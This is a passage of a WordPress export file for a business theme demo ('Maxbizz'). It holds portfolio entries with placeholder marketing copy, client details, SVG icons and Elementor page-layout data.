		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/money-market/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=806</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>April 12, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>806</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money-market]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[807]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"16f55f4a","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"418cd74c","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ea00633","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1aec01ac","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"54e30f49","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"3f7f7a0b","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"768a37c4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bf03c4e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"14cfe9ce","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3803acb8","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"43e55b12","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"6e436e0b","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c09acaf","elType":"widget","settings":{"editor":"<p>April 12, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7c3887","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"63f2a3ed","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"132a8999","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"73f1d5f9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"116d0b4d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"1d1c84c3","elType":"section","settings":[],"elements":[{"id":"4f952dbc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d619e9a","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2d3ff0cc","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5e5a2565","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"2033c382","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"411356f7","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7991c473","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3f396f89","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"5db3ca9b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ac2608","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"51b1f6b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5985d038","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1b753cdf","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"91f66f9","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2a114b5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7b2be906","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"115ea507","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"1272afe6","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e09f9db","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"7f05e45d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"37ac7518","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"3685e3e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"79ed94fb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6f9b0181","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>OCT Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/oct-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=810</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>May 22, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
